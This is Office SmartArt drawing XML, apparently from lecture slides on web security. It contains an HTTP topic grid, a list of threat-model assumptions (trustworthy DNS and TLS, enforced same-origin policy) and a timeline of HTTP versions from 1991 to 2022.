    <dgm:cxn modelId="{37E3C108-AEDA-4C81-98A7-039BBFD7D04A}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{16BA37F9-AC83-41A1-A225-BBEBE30F8506}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{5F8D449F-EBF2-4A8C-8EE6-0E76D9DEF81F}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{1C86E322-F3BB-40E4-839E-62056634B463}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{90E17D68-C330-4B7B-90B4-D181B0105EF8}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{D55B1135-6DD8-40C9-8028-16DE692531B9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{04AAA966-BCD2-488A-B651-DE1D73B4AA4C}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{B53B3CB0-7947-4C97-9FC3-79535C163E47}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{36F1EF02-A77F-44A9-BFFF-B990B76510FD}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{74AACED8-4F77-4342-8753-E8B191E4254D}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{5AB3FF55-EC45-4135-9783-2A688437DFFE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{24F445CA-0D57-4173-B075-BCEC38CA33DE}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{DA846994-6090-4F97-9118-4EBEE2B30F8C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{57957B3C-796F-4211-A3C7-C59AD91FC1FA}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{80F31A04-C3F1-44A5-A746-95697069E664}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{74F038F8-E16C-4259-B7BD-CCE431F19228}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{DFEA2BC7-A331-4216-89BD-89A50FEA012E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{F0D1E607-0193-4365-B0DC-2BAA04925465}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{AB6F2A78-327A-406C-BB74-7F469DEF392E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{4DA2E24B-5EF4-4197-87F9-78E26FE0C5DF}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{050DBE32-6DC4-4105-B402-25076EDCB28A}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{1E4B2310-80F1-4CAF-B02E-463A43984266}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{2AE44BBD-DA0D-47BA-96F3-02E0D27B4F13}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{BA9C5326-2DFE-4E0D-82D0-779AF7799A08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{8B78B94D-A2C5-4016-8511-D978078A5722}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{FD9B2A4B-0A15-4C6D-8F09-2E3A9FAC16C3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{B11EB1E3-18B1-4377-8CBD-A78EA152B23C}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{A1D9E0A4-E264-48F0-BFDD-B9B6FC53C494}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{053F436C-162C-4AC7-8BBD-250A0724FBE6}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{7A2975E1-3363-4AF5-BE51-9FE82BE2B954}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{CDE4DA75-6068-4FE1-927B-17671876D1D8}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{1B52978E-ECBA-48BB-829C-C28D41F6A9FB}"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1BC15-BB69-47AE-BD5C-D4718FB063F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3682" y="407114"/>
          <a:ext cx="3590925" cy="143637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HTTP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3682" y="407114"/>
        <a:ext cx="3590925" cy="1436370"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8F2DD67-61C9-454D-8B88-4666D1CEF417}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3682" y="1843485"/>
          <a:ext cx="3590925" cy="28548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HTTP 0.9/1.0</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 1.1</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>Cookies</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3682" y="1843485"/>
        <a:ext cx="3590925" cy="2854800"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D795AD54-04A0-47F0-991F-2E07EDA41ACF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4097337" y="407114"/>
          <a:ext cx="3590925" cy="143637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Web Security</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4097337" y="407114"/>
        <a:ext cx="3590925" cy="1436370"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{63CBBE27-B9AA-4B4F-B955-619E8E263C8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4097337" y="1843485"/>
          <a:ext cx="3590925" cy="28548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Same Origin Policy</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>Cross Site Scripting</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>Cross Site Request Forgery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4097337" y="1843485"/>
        <a:ext cx="3590925" cy="2854800"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2CBC7C3-C767-4C48-9CD3-E2C0865531E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8190992" y="407114"/>
          <a:ext cx="3590925" cy="143637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Evolution of HTTP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8190992" y="407114"/>
        <a:ext cx="3590925" cy="1436370"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{604B129E-384B-4F89-A7BF-333BD1D83ACD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8190992" y="1843485"/>
          <a:ext cx="3590925" cy="28548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HTTP 2</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200" dirty="0"/>
            <a:t>HTTP 3 </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8190992" y="1843485"/>
        <a:ext cx="3590925"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3B39B-79DA-482F-841A-5EE3E2C857E0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6753471" y="-2866301"/>
          <a:ext cx="7942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No eavesdropping, no monster-in-the-middle attacks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="140327"/>
        <a:ext cx="6691211" cy="716726"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5A2FE17F-A587-4C42-B508-8210B5A6B3F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2270"/>
          <a:ext cx="3785616" cy="992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Attackers cannot intercept, drop, or modify traffic</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="48466" y="50736"/>
        <a:ext cx="3688684" cy="895908"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7FAEC8B6-DAA0-4C38-986A-FFB4199A8AF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6753471" y="-1823818"/>
          <a:ext cx="7942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No DNS spoofing or Kaminsky</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="1182810"/>
        <a:ext cx="6691211" cy="716726"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB1A3BE9-9B78-4AFE-8A6E-29A22A639043}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1044753"/>
          <a:ext cx="3785616" cy="992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DNS is trustworthy</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="48466" y="1093219"/>
        <a:ext cx="3688684" cy="895908"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F0778054-FC64-4761-AD34-6E2D87DB85C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6753471" y="-781336"/>
          <a:ext cx="7942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No Beast, POODLE, or stolen certs</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="2225292"/>
        <a:ext cx="6691211" cy="716726"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F27D59E6-31A2-4A2A-95B6-4C12DBFAF86F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2087235"/>
          <a:ext cx="3785616" cy="992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TLS and CAs are trustworthy</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="48466" y="2135701"/>
        <a:ext cx="3688684" cy="895908"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7298B8CE-AFE1-474D-947D-FD31FC2F5AF4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6753471" y="261145"/>
          <a:ext cx="7942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SOP restrictions are faithfully enforced</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="3267774"/>
        <a:ext cx="6691211" cy="716726"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2FA8E784-179B-433E-9527-A02382773419}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3129717"/>
          <a:ext cx="3785616" cy="992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Scripts cannot escape browser sandbox</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="48466" y="3178183"/>
        <a:ext cx="3688684" cy="895908"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D484A84E-EA4F-4D9D-B8BC-28C6DF1094B5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6753471" y="1303628"/>
          <a:ext cx="7942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Not realistic, drive-by-download attacks are very common</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="228600" lvl="1" indent="-228600" algn="l" defTabSz="933450">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200"/>
            <a:t>But this restriction forces the attacker to be more creative ;)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="4310257"/>
        <a:ext cx="6691211" cy="716726"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{33984A3E-1F32-441C-AF50-6AC981545AF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4172199"/>
          <a:ext cx="3785616" cy="992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Browser/plugins/extensions are free from vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="48466" y="4220665"/>
        <a:ext cx="3688684" cy="895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93FF2-D5FB-40E6-95CF-E5C3D654F3A9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="1217929" y="1668780"/>
          <a:ext cx="510540" cy="1767840"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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1991</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="614203" y="2322353"/>
        <a:ext cx="1742917" cy="460694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47C3AB37-9C52-4749-B530-0C50D80BC6F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="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213360" numCol="1" spcCol="1270" anchor="b" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 0.9</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC912698-20C3-46C9-91CC-B8952EE0BD18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1473199" y="1888998"/>
          <a:ext cx="0" cy="408432"/>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F681138-387A-4C28-8B52-443560771A07}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1422145" y="1786890"/>
          <a:ext cx="102108" cy="1021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1EA8D1-178B-416A-B0DD-97987602BF60}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2357119" y="2297429"/>
          <a:ext cx="1767840" cy="51054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1995</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2357119" y="2297429"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{160C516D-BF93-417D-B6CC-BE4F8A22E8FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1767839" y="331851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0" numCol="1" spcCol="1270" anchor="t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>SSL</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1767839" y="3318510"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C32AB0A-B872-4B54-AB35-ED916279DD2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3241039" y="2807969"/>
          <a:ext cx="0" cy="408432"/>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573812A-97EF-4588-A3B1-0873349993A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3189985" y="3216402"/>
          <a:ext cx="102108" cy="1021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593EFD-16AD-409F-A6A3-937D7A8ABA02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4124959" y="2297430"/>
          <a:ext cx="1767840" cy="51054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1996</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4124959" y="2297430"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E532C61B-EF81-474F-B04E-1AA02E24B7D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3535679" y="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213360" numCol="1" spcCol="1270" anchor="b" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 1.0</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3535679" y="0"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D3BE0A94-0A8A-456A-B10C-8B69CA2B8DFF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5008879" y="1888998"/>
          <a:ext cx="0" cy="408432"/>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10D6179-C436-4999-87D9-7ADF18631E52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4957826" y="1786890"/>
          <a:ext cx="102108" cy="1021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6110A3-E0D0-43B3-92B3-A4A5E84D4558}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5892800" y="2297429"/>
          <a:ext cx="1767840" cy="51054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1997</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5892800" y="2297429"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C260E6D6-FF44-4199-BD8D-9ACC1EA04FB4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5303519" y="331851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0" numCol="1" spcCol="1270" anchor="t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 1.1</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5303519" y="3318510"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16BA37F9-AC83-41A1-A225-BBEBE30F8506}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6776719" y="2807969"/>
          <a:ext cx="0" cy="408432"/>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86E322-F3BB-40E4-839E-62056634B463}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6725666" y="3216402"/>
          <a:ext cx="102108" cy="1021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3FF55-EC45-4135-9783-2A688437DFFE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7660640" y="2297430"/>
          <a:ext cx="1767840" cy="51054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2015</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7660640" y="2297430"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA846994-6090-4F97-9118-4EBEE2B30F8C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7071360" y="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213360" numCol="1" spcCol="1270" anchor="b" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 2</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7071360" y="0"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{80F31A04-C3F1-44A5-A746-95697069E664}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8544559" y="1888998"/>
          <a:ext cx="0" cy="408432"/>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FEA2BC7-A331-4216-89BD-89A50FEA012E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8493506" y="1786890"/>
          <a:ext cx="102108" cy="1021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C5326-2DFE-4E0D-82D0-779AF7799A08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="10057130" y="1668779"/>
          <a:ext cx="510540" cy="1767840"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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2022</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="9428481" y="2322352"/>
        <a:ext cx="1742917" cy="460694"/>
      </dsp:txXfrm>
    </dsp:sp>
